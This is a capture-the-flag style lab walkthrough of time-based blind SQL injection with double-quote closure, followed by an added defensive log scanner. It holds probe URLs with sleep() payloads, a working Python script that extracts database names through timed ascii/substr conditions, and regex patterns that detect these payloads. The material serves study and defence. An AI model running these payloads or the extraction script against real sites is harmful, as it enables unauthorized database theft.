Less-10
Less-10 GET - Blind - Time based - double quotes (time-based blind injection, double-quote closure)
1. Check whether an injection point exists
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1'
Normal response
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1"
Normal response
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Normal response
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
Delayed response => injection exists
2. Determine the parameter type
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1 and sleep(3) --+
Normal response
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
Delayed response => string type
3. Close the parameter (quote closure)
https://636-14d01b61-fcd8-4f30-9253-3bb08684c3f6.do-not-trust.hacking.run/?id=1" and sleep(3) --+
Delayed response => closure succeeded
4. Perform the time-based blind injection
Python script
import requests
import time

# Base URL; the double-quote closure is supplied by the payload below.
# (The original had a mismatched quote here: 'https://...?id=1" )
url = 'https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1'

# Subqueries to extract one value at a time (limit 0,1 selects the first row).
database = 'select schema_name from information_schema.schemata'
tables = 'select table_name from information_schema.tables where table_schema=database()'
# "table_name" is a placeholder to be replaced with a table found via `tables`.
column = 'select column_name from information_schema.columns where table_name="table_name"'

result = ''
# Guess each character position (1..29) by ASCII code '0'..'z'.
# The original used range(48, 122), which silently excludes 'z' (122).
for i in range(1, 30):
    for j in range(48, 123):
        # if the i-th character of the result equals j, the server sleeps 2s;
        # "--+" comments out the rest of the original query.
        payload = '" and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+'.format(database, i, j)
        stime = time.time()
        r = requests.get(url + payload)
        etime = time.time()
        if etime - stime >= 2:
            result += chr(j)
            print(result)
            break
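As an added example, not part of the original write-up, the defender's counterpart to the probing above: a small Python scanner that flags the time-based blind payload shapes used in this lesson (sleep()/benchmark(), the if(ascii(substr(...))) extraction form, information_schema reads) in web access logs and correlates them with slow responses. The log layout, the trailing response-time field in milliseconds, and the log lines themselves are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page); the last field
# is an assumed per-request response time in milliseconds.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 12
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%22%20and%20sleep(3)%20--+ HTTP/1.1" 200 512 3021
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /?id=1%22%20and%20if(ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=115,sleep(2),1)--+ HTTP/1.1" 200 512 2015
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /?id=2 HTTP/1.1" 200 498 10
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<ms>\d+)$')

# Markers of MySQL time-based blind injection: delay functions, the
# conditional character-extraction shape, and schema enumeration.
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
EXTRACT_RE = re.compile(r'\bif\s*\(\s*ascii\s*\(\s*substr', re.I)
SCHEMA_RE = re.compile(r'\binformation_schema\b', re.I)


def classify(line, slow_ms=1000):
    """Return an alert dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group('path'))  # %22 -> ", %20 and + -> space
    reasons = []
    if DELAY_RE.search(query):
        reasons.append('delay_function')
    if EXTRACT_RE.search(query):
        reasons.append('conditional_extraction')
    if SCHEMA_RE.search(query):
        reasons.append('information_schema')
    # A delay payload paired with a slow response is the strongest signal:
    # the injected condition actually executed on the database.
    if reasons and int(m.group('ms')) >= slow_ms:
        reasons.append('slow_response')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'reasons': reasons, 'ms': int(m.group('ms'))}


def scan(log_text, slow_ms=1000):
    """Scan a whole log and return one alert per suspicious request."""
    return [a for a in (classify(l, slow_ms) for l in log_text.splitlines()) if a]
```

Running scan(SAMPLE_LOG) yields two alerts, both from 10.0.0.5; the second carries all four reasons, which is the signature of the extraction loop in the script above.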
